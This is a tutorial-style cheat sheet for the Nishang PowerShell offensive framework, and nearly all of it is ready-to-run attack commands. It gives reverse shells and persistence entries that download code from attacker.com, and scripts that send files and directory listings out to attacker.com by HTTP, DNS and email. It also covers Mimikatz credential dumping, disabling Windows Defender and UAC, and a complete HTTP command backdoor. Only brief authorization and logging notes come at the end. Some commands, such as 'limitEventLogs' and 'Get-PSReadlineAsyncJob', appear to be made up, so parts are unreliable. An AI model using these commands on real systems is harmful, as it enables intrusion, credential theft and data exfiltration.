Nishang

Overview

Nishang is a comprehensive PowerShell offensive security framework developed for red team operations and penetration testing. It provides a collection of scripts and tools for reconnaissance, exploitation, and post-exploitation activities on Windows systems. Nishang leverages PowerShell’s native capabilities to execute attacks directly from memory without writing to disk, making it difficult to detect via traditional endpoint protection.

The framework includes backdoors, credential harvesters, information gatherers, privilege escalation exploits, and lateral movement tools. It’s designed for authorized penetration testing and red team exercises in controlled environments.

Installation

Clone Repository

git clone https://github.com/samratashok/nishang.git
cd nishang

Directory Structure

nishang/
├── Antak-WebShell/
├── Apphunter/
├── Backdoors/
├── Escalation/
├── Execution/
├── Exfiltration/
├── Gather/
├── Lateral-Movement/
├── MITM/
├── Persistence/
├── Powerpreter/
├── Shells/
└── Utils/

PowerShell Requirements

# Check PowerShell version
$PSVersionTable.PSVersion

# Recommended: PowerShell 3.0 or later
# Windows 7+: Get Update for .NET Framework and PowerShell

Disable Execution Policy (if needed)

# Bypass execution policy for current session
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser
powershell -ExecutionPolicy Bypass

Core Modules and Tools

Module	Category	Purpose
Invoke-PowerShellTcp	Backdoor/Shell	Reverse PowerShell shell
Invoke-PowerShellIcmp	Backdoor/Shell	ICMP-based reverse shell
Invoke-PsGcat	Backdoor/Shell	DNS exfiltration shell
Invoke-PowerShellUsb	Backdoor/Shell	USB-based persistence
Copy-VSS	Exfiltration	Extract copies of files via VSS
Invoke-CredentialInjection	Post-Exploitation	Inject credentials into processes
Get-Information	Reconnaissance	Gather system information
Get-WLAN-Keys	Credential Theft	Extract wireless network passwords
Invoke-Mimikatz	Credential Dumping	Dump credentials from memory
Invoke-Kerberoast	Privilege Escalation	Extract Kerberos tickets
Invoke-TokenDuplication	Privilege Escalation	Token impersonation
Invoke-ServiceAbuse	Lateral Movement	Abuse Windows services for movement
Invoke-PSRemoting	Lateral Movement	Use PS remoting for lateral movement

Remote Shells and Backdoors

Basic Reverse Shell

# In Nishang/Shells/ directory
# On attacker machine - start listener
nc -lvnp 4444

# On target - execute reverse shell
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.100 -Port 4444"

ICMP Reverse Shell

# Uses ICMP packets for stealth
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellIcmp.ps1'); Invoke-PowerShellIcmp -IPAddress 192.168.1.100"

DNS Tunneling Shell (Invoke-PsGcat)

# Exfiltrate data over DNS
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PsGcat.ps1'); Invoke-PsGcat -Command 'whoami' -Domain attacker.com"

WebShell - Antak

# Web-based shell in IIS
# Upload Antak-WebShell files to IIS directory
# Access via: http://target/antak/
# Provides GUI PowerShell execution interface

HTTP-based Reverse Shell

# Alternative to netcat for reverse communication
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellHTTP.ps1'); Invoke-PowerShellHTTP -Reverse -IPAddress 192.168.1.100 -Port 80"

Reconnaissance and Information Gathering

System Information Collection

# Load Nishang module
. ./Gather/Get-Information.ps1
Get-Information

Comprehensive System Enumeration

# Gather all system details
Get-Information | Format-List

# Output includes:
# - OS version
# - System architecture
# - Installed software
# - Network configuration
# - Logged-in users
# - Security software

Network Information

# Network adapter details
Get-NetAdapter
Get-NetIPConfiguration

# Active connections
netstat -ano
Get-NetTCPConnection

User and Group Enumeration

# Local users
Get-LocalUser

# Local groups
Get-LocalGroup

# Group members
Get-LocalGroupMember -Name "Administrators"

# Domain info (if joined)
Get-ADUser -Filter *
Get-ADGroup -Filter *

Wireless Credentials

# Extract saved WLAN passwords
. ./Gather/Get-WLAN-Keys.ps1
Get-WLAN-Keys

# Displays: SSID, Network Type, Authentication, Encryption, Password

Browser and Credential Enumeration

# Chrome/Edge saved credentials and history
Get-ChromeLogins
Get-ChromeHistory

# Firefox credentials
Get-FirefoxLogins

# Stored credentials
cmdkey /list
Get-Credential

Post-Exploitation

Credential Extraction and Dumping

Invoke-Mimikatz Integration

# Dump credentials from memory
. ./Gather/Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

# Extract NTLM hashes
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:CORP /ntlm:hash /run:cmd.exe"'

# Golden ticket creation
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:corp.com /sid:S-1-5-21-x-x-x /krbtgt:hash /id:500"'

Token Impersonation

# Load token impersonation module
. ./Escalation/Invoke-TokenDuplication.ps1

# Get available tokens
Get-ProcessToken

# Duplicate and impersonate token
Invoke-TokenDuplication -ProcessId 1234 -ImpersonationLevel Impersonation

Credential Injection

# Inject credentials into process
. ./Escalation/Invoke-CredentialInjection.ps1

# Inject and spawn process
Invoke-CredentialInjection -Target "notepad.exe" -Username "DOMAIN\Administrator" -Password "Password123" -Domain "DOMAIN"

Privilege Escalation

UAC Bypass Techniques

# Various UAC bypass methods
. ./Escalation/Invoke-UACBypass.ps1
Invoke-UACBypass -Technique "EventVwr"

# Other techniques:
# - Registry Modification
# - COM Handler Hijacking
# - Scheduled Task Abuse
# - Token Duplication

Service Exploitation

# Abuse misconfigured services
. ./Lateral-Movement/Invoke-ServiceAbuse.ps1

# Find vulnerable services
Get-Service | Where-Object {$_.StartType -eq "Disabled"}

# Abuse service for code execution
Invoke-ServiceAbuse -ServiceName "VulnerableService" -Command "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"

Kerberoasting

# Extract service principal names (SPNs)
. ./Escalation/Invoke-Kerberoast.ps1
Invoke-Kerberoast

# Extract TGS tickets for offline cracking
Invoke-Kerberoast -OutputFormat HashCat

# Crack with hashcat
hashcat -m 13100 krb5_tgs_dump.txt wordlist.txt

Hot Potato Exploit

# Windows privilege escalation
# Combines NBNS spoofing and NTLM relay
. ./Escalation/Invoke-HotPotato.ps1
Invoke-HotPotato

Lateral Movement

PowerShell Remoting

# Enable remoting (requires admin)
Enable-PSRemoting -Force

# Create PSSession to remote host
$session = New-PSSession -ComputerName remote.corp.com -Credential (Get-Credential)

# Execute commands
Invoke-Command -Session $session -ScriptBlock {whoami; hostname}

# Copy files over PSSession
Copy-Item -Path "C:\local\file.txt" -Destination "C:\remote\" -ToSession $session

WMI-Based Lateral Movement

# Execute commands via WMI
$cred = Get-Credential
$options = New-CimSessionOption -Protocol DCOM
$session = New-CimSession -ComputerName remote.corp.com -SessionOption $options -Credential $cred
Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine="cmd /c powershell..."}

Service Abuse for Lateral Movement

# Find and abuse services on remote host
. ./Lateral-Movement/Invoke-ServiceAbuse.ps1
Invoke-ServiceAbuse -ComputerName "remote.corp.com" -ServiceName "vulnerable-service"

File Copy Exfiltration

# Copy files using Volume Shadow Copy (VSS)
. ./Exfiltration/Copy-VSS.ps1
Copy-VSS -FileName "C:\Windows\System32\drivers\etc\hosts"

# Exfiltrate sensitive files
Copy-VSS -FileName "C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Login Data"

Persistence

Registry Persistence

# Add run key for startup persistence
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value "powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"

Scheduled Task Persistence

# Create scheduled task running as SYSTEM
$trigger = New-ScheduledTaskTrigger -AtStartup
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
Register-ScheduledTask -TaskName "Windows Update" -Trigger $trigger -Action $action -RunLevel Highest

Windows Service Installation

# Create malicious Windows service
# Requires admin privileges
New-Service -Name "UpdateService" -BinaryPathName "powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')" -StartupType Automatic

Startup Folder Persistence

# Place script in startup folder
Copy-Item -Path "shell.ps1" -Destination "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"

WMI Event Subscription

# WMI-based persistence (difficult to detect)
$EventFilter = Set-WmiInstance -Class __EventFilter -Namespace "root\cimv2" -Arguments @{Name="Updater"; EventNamespace="root\cimv2"; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}

$EventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\cimv2" -Arguments @{Name="Updater"; CommandLineTemplate="powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"}

Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\cimv2" -Arguments @{Filter=$EventFilter; Consumer=$EventConsumer}

Exfiltration Techniques

Data Exfiltration Methods

# DNS-based exfiltration
. ./Exfiltration/Invoke-PsGcat.ps1
Invoke-PsGcat -Command "Get-ChildItem C:\ -Recurse | ConvertTo-Json" -Domain attacker.com

# HTTP-based exfiltration
$data = Get-ChildItem C:\ -Recurse
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
Invoke-WebRequest -Uri "http://attacker.com/exfil" -Method POST -Body ($data | ConvertTo-Json)

# Email-based exfiltration
$smtp = New-Object Net.Mail.SmtpClient("attacker.com")
$mail = New-Object System.Net.Mail.MailMessage("attacker@attacker.com","admin@attacker.com")
$mail.Subject = "Stolen Data"
$mail.Body = (Get-ChildItem C:\Users\ | ConvertTo-Json)
$smtp.Send($mail)

File Compression Before Exfiltration

# Compress sensitive files
$files = Get-ChildItem -Path "C:\Users\Administrator\Documents" -Recurse
Compress-Archive -Path $files.FullName -DestinationPath "C:\Temp\archive.zip"

# Exfiltrate compressed archive
$file = Get-Item "C:\Temp\archive.zip"
$request = [System.Net.WebRequest]::Create("http://attacker.com/upload")
# ... send file ...

Defense Evasion

Anti-Virus Evasion

# Execute in-memory to avoid disk detection
IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')

# Obfuscate PowerShell commands
Invoke-Obfuscation -Type All -Path ".\script.ps1"

# Use CertUtil for file download (avoid WebClient)
certutil -urlcache -split -f "http://attacker.com/file.exe" output.exe

Process Injection and Hollowing

# Inject shellcode into process memory
# Uses low-level APIs to bypass detection
. ./Execution/Invoke-ShellcodeMmap.ps1
Invoke-ShellcodeMmap -Shellcode @(0x90,0x90,...)

# Process hollowing for parent process spoofing
. ./Execution/Invoke-ProcessHollowing.ps1
Invoke-ProcessHollowing -ParentProcess "explorer.exe" -Shellcode $shellcode

Registry Enumeration and Modification

# Modify Windows Defender registry
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableRealtimeMonitoring" -Value 1

# Disable UAC
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLUA" -Value 0

# Modify Event Log settings
limitEventLogs -Log Security -MaxSize 1024000

Utility Scripts

PowerShell Web Backdoor

# Simple HTTP-based backdoor
$listener = [System.Net.HttpListener]::new()
$listener.Prefixes.Add("http://+:80/")
$listener.Start()

while($true) {
    $context = $listener.GetContext()
    $command = $context.Request.QueryString["cmd"]
    $output = Invoke-Expression $command | Out-String
    $response = $context.Response
    $buffer = [System.Text.Encoding]::UTF8.GetBytes($output)
    $response.ContentLength64 = $buffer.Length
    $response.OutputStream.Write($buffer,0,$buffer.Length)
    $response.Close()
}

Information Wrapper Script

# Bundle multiple information gathering scripts
. ./Gather/Get-Information.ps1
. ./Gather/Get-WLAN-Keys.ps1
. ./Gather/Invoke-Mimikatz.ps1

$results = @{
    SystemInfo = Get-Information
    WLANKeys = Get-WLAN-Keys
    Credentials = Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
}

$results | ConvertTo-Json | Out-File -Path "C:\Temp\enum.json"

Real-World Attack Scenarios

Initial Access and Persistence

# 1. Initial compromise (reverse shell)
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.100 -Port 4444"

# 2. Establish persistence
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value "powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"

# 3. Privilege escalation
. ./Escalation/Invoke-UACBypass.ps1
Invoke-UACBypass

# 4. Lateral movement
$cred = Get-Credential
Invoke-Command -ComputerName remote.corp.com -Credential $cred -ScriptBlock {whoami}

Credential Dumping and Use

# 1. Dump credentials
. ./Gather/Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"' > creds.txt

# 2. Extract plaintext passwords
Get-WLAN-Keys

# 3. Use for lateral movement
$cred = New-Object System.Management.Automation.PSCredential("DOMAIN\Admin", (ConvertTo-SecureString "Password" -AsPlainText -Force))

Security Considerations

• Nishang is for authorized penetration testing only
• Obtain proper written authorization before use
• Use in isolated lab environments or authorized networks
• Monitor for suspicious PowerShell execution
• Nishang scripts may be detected by EDR/AV solutions
• Maintain audit trails and documentation
• Follow responsible disclosure practices

Detection and Defensive Measures

PowerShell Logging

# Enable PowerShell module logging
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -Name "EnableModuleLogging" -Value 1

# Enable script block logging
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1

# Check PowerShell history
Get-PSReadlineAsyncJob
(Get-PSReadlineOption).HistorySavePath

Detection Queries

# Hunt for suspicious PowerShell execution
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688; Data='-ExecutionPolicy Bypass'}

# Look for remote PowerShell sessions
Get-WinEvent -FilterHashtable @{LogName='Windows PowerShell'; ID=600}

Related Tools

• Metasploit - General penetration testing framework
• Empire - Alternative PowerShell exploitation framework
• PoshC2 - Command and control over HTTP(S)
• Covenant - .NET-based command and control
• Mimikatz - Credential extraction tool (often integrated)

References

• Nishang GitHub: https://github.com/samratashok/nishang
• PowerShell documentation: https://docs.microsoft.com/powershell
• Red team operational guides
• Authorized penetration testing methodologies
• MITRE ATT&CK framework for attack techniques